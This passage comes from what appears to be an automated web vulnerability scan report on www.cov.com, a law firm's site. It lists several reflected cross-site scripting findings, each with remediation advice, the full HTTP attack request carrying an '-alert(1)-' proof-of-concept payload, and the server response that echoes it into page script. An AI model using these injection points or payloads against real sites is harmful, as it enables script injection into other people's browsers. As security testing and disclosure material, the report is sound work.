This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1156; path=/
Set-Cookie: PortletId=1147501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14611


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Diversity Update</title>
<meta nam
...[SNIP]...
ment.aspnetForm.action = '/diversityupdate/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityupdate/Diversity.aspx?c2d31'-alert(1)-'bf8e984b8ec=1';//]]>
...[SNIP]...

4.66. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /extranet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1260; path=/
Set-Cookie: PortletId=1254901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
A[
document.aspnetForm.action = '/extranet/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/extranet/GeneralPageData.aspx?6f529'-alert(1)-'c70c33782c6=1';//]]>
...[SNIP]...

4.67. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /firmoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=1135501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm Overview</title>
<meta n
...[SNIP]...
ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]>
...[SNIP]...

4.68. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1169; path=/
Set-Cookie: PortletId=1162901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Women...s Forum</title>
<meta name
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/forum/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/forum/Diversity.aspx?cb6be'-alert(1)-'7a5f32d74e6=1';//]]>
...[SNIP]...

4.69. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /honorsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=1136501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Honors & Rankings</title>
<meta name="language
...[SNIP]...
ent.aspnetForm.action = '/honorsrankings/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/honorsrankings/AboutSection.aspx?f4088'-alert(1)-'6fb7096a36d=1';//]]>
...[SNIP]...

4.70. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /leadersindiversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1152; path=/
Set-Cookie: PortletId=1143501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Leaders in Diversity</title>
<meta
...[SNIP]...
spnetForm.action = '/leadersindiversity/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/leadersindiversity/Diversity.aspx?1cac5'-alert(1)-'90719ebe248=1';//]]>
...[SNIP]...

4.71. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /legalnotices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1165; path=/
Set-Cookie: PortletId=1156501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Legal Notices</title>
<meta name="language" co
...[SNIP]...
ment.aspnetForm.action = '/legalnotices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/legalnotices/GeneralPageData.aspx?a0792'-alert(1)-'83d5d12175f=1';//]]>
...[SNIP]...

4.72. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /mclarty

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:44:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1407; path=/
Set-Cookie: PortletId=4044201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | McLarty Associates</title>
<meta name="languag
...[SNIP]...
[CDATA[
document.aspnetForm.action = '/mclarty/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/mclarty/AboutSection.aspx?354a9'-alert(1)-'6c85014edb2=1';//]]>
...[SNIP]...

4.73. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:41:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1';//]]>
...[SNIP]...

4.74. http://www.cov.com/news/detail.aspx [news parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
